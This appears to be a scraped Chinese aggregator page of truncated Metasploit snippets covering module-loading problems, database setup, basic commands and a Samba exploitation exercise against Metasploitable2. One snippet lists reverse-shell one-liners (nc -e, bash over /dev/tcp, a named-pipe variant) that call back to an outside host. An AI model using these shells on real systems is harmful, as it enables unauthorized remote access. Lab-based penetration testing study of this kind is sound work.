metasploit

I can't get new modules to load in metasploit

不羁的心 提交于 2019-12-12 04:34:16
问题 I have been trying to load a new module in MS. I followed the instructions and done a git clone [address of files]. I then copied the new files into /root/.msf4/modules/exploits/windows/smb and into /usr/share/metasploit-framework/modules/windows/smb and issued reload_all and restarted msfconsole but still no matter what way i try it it still says: msf > use exploits/windows/smb/eternalblue_doublepulsar [-] Failed to load module: exploits/windows/smb/eternalblue_doublepulsar msf > i tried

How to add module in Metasploit?

两盒软妹~` 提交于 2019-12-11 08:47:13
问题 I'm using Metasploit on Windows, but I can't load ms17_010_eternalblue. So I download it from github. How can I add that modules to my Metasploit? 回答1: solved... https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/issues/30 copy to "metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.14.19/modules/exploits/windows" thanks 来源: https://stackoverflow.com/questions/48285326/how-to-add-module-in-metasploit

Metasploit msfconsole method_missing on Fedora 19

て烟熏妆下的殇ゞ 提交于 2019-12-10 20:44:23
问题 I installed metasploit on my Fedora 19 using this guide from fedora. After finishing all the steps I run msfconsole and get the following error: /usr/local/share/ruby/site_ruby/rubygems/specification.rb:1888:in 'method_missing': undefined local variable or method 'ext_dir' for #<Gem::Specification:0xecbd78 json-1.8.0> (NameError) from /usr/share/gems/gems/bundler-1.3.1/lib/bundler/rubygems_ext.rb:42:in 'load_paths' from /usr/share/gems/gems/bundler-1.3.1/lib/bundler/runtime.rb:37:in 'block in

Metasploit笔记

徘徊边缘 提交于 2019-12-10 00:17:09
  Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。 0x01 基本操作 1、运行   Shell中直接输入msfconsole 2、建立搜索缓存(数据库) 启动PostgreSQL数据库服务 :service postgresql start 监听5432端口 初始化Metasploit数据库 :msfdb init 查看数据库联接情况 :msfconsole db_status 建立数据库缓存 :msfconsole db_rebuild_cache 3、专业术语 12345 – Exploit,攻击工具/代码 – Payload,攻击载荷 – Shellcode – Module,模块 – Listener,监听器 4、Metasploit主目录 Kali Linux /usr/share/metasploit-framework 5、常用命令 123456789101112 show exploits – 查看所有可用的渗透攻击进程代码 show auxiliary – 查看所有可用的辅助攻击工具 show options – 查看该模块所有可用选项 show

Audio streaming using metasploit

╄→尐↘猪︶ㄣ 提交于 2019-12-08 03:14:58
问题 This question was migrated from Unix & Linux Stack Exchange because it can be answered on Stack Overflow. Migrated last year . I want to make a microphone audio stream in metasploit like webcam_stream,so I added some codes to the ruby script at : (/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb ), the added piece of code is: def cmd_mic_stream(*args) print_status("Starting...") stream_path = Rex::Text.rand_text_alpha(8) + ".wav" player

Linux下内网反弹技巧总结与杂谈

断了今生、忘了曾经 提交于 2019-12-07 14:13:28
导读 靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。 通常,在做渗透的时候会“运气好”,碰到某些应用上存在远程命令执行漏洞,近来由于java反序列化和二进制类漏洞的层出不穷,也加持着这种漏洞越发增多。 一般来说,靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。 反弹技巧总结: 1、NC反弹 Nc 1.1.1.1 8080 -e /bin/bash 2、Bash-socket反弹 /bin/bash -i > /dev/tcp/1.1.1.1/8080 0<&1 2>&1 3、Shell-socket反弹 a) exec 2>&0;0<&196; exec 196<>/dev/tcp/1.1.1.1/8080; sh <&196 >&196 2>&196 b) exec 5<>/dev/tcp/1.1.1.1/8080 cat <&5 | while read line; do $line 2>&5 >&5; done[分两句执行] 4、文件管道-nc/telnet反弹 a) rm /tmp/f

[后渗透]Metasploit使用基础

两盒软妹~` 提交于 2019-12-06 03:05:17
0x00 简介 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 0x01 配置MSF的数据库 首先配置下MSF的数据库:可提升查询攻击模块的速度,以及利用速度 1.1 进入msf 查询数据库连接情况:发现默认情况下并未连接数据库 $msf> db_status 1.2 配置数据库 $service postgres enable $service postgres start $msfdb init 1.3 连接密码 看到上面的配置文件的提示,就可以通过文件地址,查看连接密码: $cat /usr/share/metasploit-framework/config/database.yml 1.4 查询 知道密码后,再次进入msf,通过db_connect 查询如何写连接的命令: 1.5 连接 再用用账号密码去连,最后 db

Pentest-bookmarks v1.5

自作多情 提交于 2019-12-05 14:16:53
Bookmarks Bookmarks Menu Recently Bookmarked Recent Tags Mozilla Firefox Help and Tutorials Customize Firefox Get Involved About Us Recently Bookmarked Recent Tags Mozilla Firefox Help and Tutorials Customize Firefox Get Involved About Us Hackery http://www.ikkisoft.com/stuff/SMH_XSS.txt XFS 101: Cross-Frame Scripting Explained | SecureState Information Security Blog What The Fuck Is My Information Security Strategy? OWASP_DanielCutbert_Evolution_WebAppPenTest.mp4 DeepSec 2007 - Aaron Portnoy Cody Pierce - RPC Auditing Tools and Techniques extern blog SensePost; Zen One: PCI Compliance -

通过Samba练习metasploit的使用

こ雲淡風輕ζ 提交于 2019-12-05 02:54:52
文章学习利用metasploit通过Samba3.X获取metasploitable2的shell,从而去熟悉metasploit的使用。 环境: kali IP:192.168.137.133 metasploitable2 IP:192.168.137.141 第一步进行主机扫描 主机扫描除了常用的nmap外,也可以使用metasploit内置的扫描器,使用命令 search portscan 搜索可用的端口扫描模块 以TCP扫描模块为例,使用use + 模块路径/模块名即可使用该模块,同时 show options 命令来查看需要设置的参数 在REQUIRED列中,标记为yes的参数为必需设置的参数,使用set命令来设置参数,unset命令来取消某个参数的设置 使用run命令,运行扫描器。 metasploit有众多扫描模块,以适应不同的需要。在metasploit中同样可以使用nmap进行扫描。在命令行中直接键入指令即可。 可以看到445端口和139端口运行着Samba服务,输入 search samba 搜索关于Samba的漏洞利用模块。 其中rank一列显示该模块的“好用程度”,一般来讲渗透效率最高。使用use命令来使用该漏洞利用模块。然后使用 show payloads 命令来查看攻击载荷。 略有不同的是选中攻击载荷的时候并非使用use命令